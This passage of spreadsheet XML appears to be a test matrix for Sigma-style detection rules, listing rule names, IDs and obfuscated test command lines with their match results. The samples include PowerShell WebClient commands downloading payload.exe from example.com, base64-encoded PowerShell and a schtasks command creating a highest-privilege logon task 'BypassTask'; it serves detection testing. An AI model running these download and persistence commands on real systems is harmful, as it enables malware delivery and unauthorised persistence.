          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2275" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2275" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2275" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnd "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2275" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2275" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2275" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2275" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2276" ht="15.75" customHeight="1" s="42">
      <c r="A2276" s="43" t="n"/>
      <c r="B2276" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2276" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2276" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2276" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnD "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2276" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2276" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2276" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2276" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2277" ht="15.75" customHeight="1" s="42">
      <c r="A2277" s="43" t="n"/>
      <c r="B2277" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2277" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2277" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2277" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2277" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2277" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2277" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I227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77" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2277" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2278" ht="15.75" customHeight="1" s="42">
      <c r="A2278" s="43" t="n"/>
      <c r="B2278" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2278" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2278" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2278" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2278" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2278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78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2278" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2279" ht="15.75" customHeight="1" s="42">
      <c r="A2279" s="43" t="n"/>
      <c r="B2279" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2279" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2279" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2279" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2279" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2279" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2279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79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2279" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2280" ht="15.75" customHeight="1" s="42">
      <c r="A2280" s="43" t="n"/>
      <c r="B2280" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2280" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2280" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2280" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2280" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2280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80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2280" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2281" ht="15.75" customHeight="1" s="42">
      <c r="A2281" s="43" t="n"/>
      <c r="B2281" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C2281" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D2281" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E2281" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F2281" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2281" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2281" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2281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281" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2281" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2282" ht="15.75" customHeight="1" s="42">
      <c r="A2282" s="43" t="n"/>
      <c r="B2282" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_webclient_casing</t>
        </is>
      </c>
      <c r="C2282" s="44" t="inlineStr">
        <is>
          <t>Net WebClient Casing Anomalies</t>
        </is>
      </c>
      <c r="D2282" s="44" t="inlineStr">
        <is>
          <t>c86133ad-4725-4bd0-8170-210788e0a7ba</t>
        </is>
      </c>
      <c r="E2282" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand TgBlAHcALQBPAGIAagBlAGMAdAAgAG4AYABFAHQALgBXAGABRQBiAEMAbABpAEUAbgBUAA==</t>
        </is>
      </c>
      <c r="F2282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2282" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2282" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2282" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2282" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2282" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2283" ht="15.75" customHeight="1" s="42">
      <c r="A2283" s="43" t="n"/>
      <c r="B2283" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_webclient_casing</t>
        </is>
      </c>
      <c r="C2283" s="44" t="inlineStr">
        <is>
          <t>Net WebClient Casing Anomalies</t>
        </is>
      </c>
      <c r="D2283" s="44" t="inlineStr">
        <is>
          <t>c86133ad-4725-4bd0-8170-210788e0a7ba</t>
        </is>
      </c>
      <c r="E2283" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc TgBlAHcALQBPAGIAagBlAGMAdAAgAG4AYABFAHQALgBXAGABRQBiAEMAbABpAEUAbgBUAA==</t>
        </is>
      </c>
      <c r="F2283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2283" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2283" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2283" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2283" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2283" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2284" ht="15.75" customHeight="1" s="42">
      <c r="A2284" s="43" t="n"/>
      <c r="B2284" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_webclient_casing</t>
        </is>
      </c>
      <c r="C2284" s="44" t="inlineStr">
        <is>
          <t>Net WebClient Casing Anomalies</t>
        </is>
      </c>
      <c r="D2284" s="44" t="inlineStr">
        <is>
          <t>c86133ad-4725-4bd0-8170-210788e0a7ba</t>
        </is>
      </c>
      <c r="E2284" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmanD TgBlAHcALQBPAGIAagBlAGMAdAAgAG4AYABFAHQALgBXAGABRQBiAEMAbABpAEUAbgBUAA==</t>
        </is>
      </c>
      <c r="F2284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2284" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2284" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2284" s="44" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J2284" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2284" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2285" ht="15.75" customHeight="1" s="42">
      <c r="A2285" s="43" t="n"/>
      <c r="B2285" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2285" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2285" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2285" s="44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F2285" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2285" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2285" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2285" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2285" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2285" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2286" ht="15.75" customHeight="1" s="42">
      <c r="A2286" s="43" t="n"/>
      <c r="B2286" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2286" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2286" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2286" s="44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F2286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2286" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2286" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2286" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2286" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2286" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2287" ht="15.75" customHeight="1" s="42">
      <c r="A2287" s="43" t="n"/>
      <c r="B2287" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2287" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2287" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2287" s="44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F2287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2287" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2287" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2287" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2287" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2287" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2288" ht="15.75" customHeight="1" s="42">
      <c r="A2288" s="43" t="n"/>
      <c r="B2288" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2288" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2288" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2288" s="44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F2288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2288" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2288" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2288" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2288" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2288" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2289" ht="15.75" customHeight="1" s="42">
      <c r="A2289" s="43" t="n"/>
      <c r="B2289" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2289" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2289" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2289" s="44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F2289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2289" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2289" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2289" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2289" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2289" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2290" ht="15.75" customHeight="1" s="42">
      <c r="A2290" s="43" t="n"/>
      <c r="B2290" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2290" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2290" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2290" s="44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F2290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2290" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2290" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2290" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2290" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2290" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2291" ht="15.75" customHeight="1" s="42">
      <c r="A2291" s="43" t="n"/>
      <c r="B2291" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2291" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2291" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2291" s="44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F2291" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2291" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2291" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2291" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2291" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2291" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2292" ht="15.75" customHeight="1" s="42">
      <c r="A2292" s="43" t="n"/>
      <c r="B2292" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2292" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2292" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2292" s="44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F2292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2292" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2292" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2292" s="44" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation (f2c64357-b1d2-41b7-849f-34d2682c0fad); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2292" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2292" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2293" ht="15.75" customHeight="1" s="42">
      <c r="A2293" s="43" t="n"/>
      <c r="B2293" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2293" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2293" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2293" s="44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F2293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2293" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2293" s="43" t="n"/>
      <c r="J2293" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2293" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2294" ht="15.75" customHeight="1" s="42">
      <c r="A2294" s="43" t="n"/>
      <c r="B2294" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2294" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2294" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2294" s="44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F2294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2294" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2294" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2294" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2294" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2294" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2295" ht="15.75" customHeight="1" s="42">
      <c r="A2295" s="43" t="n"/>
      <c r="B2295" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C2295" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D2295" s="44" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E2295" s="44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F2295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2295" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2295" s="43" t="n"/>
      <c r="J2295" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2295" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2296" ht="15.75" customHeight="1" s="42">
      <c r="A2296" s="43" t="n"/>
      <c r="B2296" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2296" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2296" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2296" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "BypassTask" /TR "powershell.exe -EncodedCommand aQBlAHgAZQB..." /SC ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F2296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2296" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2296" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2296" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2296" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2296" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2297" ht="15.75" customHeight="1" s="42">
      <c r="A2297" s="43" t="n"/>
      <c r="B2297" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2297" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2297" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2297" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "BypassTask" /"TR" "powershell.exe -"EncodedCommand" aQBlAHgAZQB..." /sc ONLOGON /"RL" HIGHEST /F</t>
        </is>
      </c>
      <c r="F2297" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2297" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2297" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2297" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2297" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2297" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2298" ht="15.75" customHeight="1" s="42">
      <c r="A2298" s="43" t="n"/>
      <c r="B2298" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2298" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2298" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2298" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" "BypassTask" /tR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /f</t>
        </is>
      </c>
      <c r="F2298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2298" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2298" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2298" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J2298" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2298" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2299" ht="15.75" customHeight="1" s="42">
      <c r="A2299" s="43" t="n"/>
      <c r="B2299" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2299" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2299" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2299" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /tR "powershell.exe -"EncodedCommand" aQBlAHgAZQB..." /"SC" ONLOGON /Rl HIGHEST /F</t>
        </is>
      </c>
      <c r="F2299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2299" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2299" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2299" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J2299" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2299" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2300" ht="15.75" customHeight="1" s="42">
      <c r="A2300" s="43" t="n"/>
      <c r="B2300" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2300" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2300" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2300" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /"TN" "BypassTask" /TR "powershell.exe -enc aQBlAHgAZQB..." /SC ONLOGON /Rl HIGHEST /"F"</t>
        </is>
      </c>
      <c r="F2300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2300" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2300" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2300" s="4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2300" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2300" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2301" ht="15.75" customHeight="1" s="42">
      <c r="A2301" s="43" t="n"/>
      <c r="B2301" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader_encoded</t>
        </is>
      </c>
      <c r="C2301" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Encoded Payload from Registry</t>
        </is>
      </c>
      <c r="D2301" s="44" t="inlineStr">
        <is>
          <t>c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78</t>
        </is>
      </c>
      <c r="E2301" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /tN "BypassTask" /tr "powershell.exe -eNcOdEDcoMmand aQBlAHgAZQB..." /SC ONLOGON /rl HIGHEST /F</t>
        </is>
      </c>
      <c r="F2301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2301" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2301" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2301" s="43" t="inlineStr">
        <is>
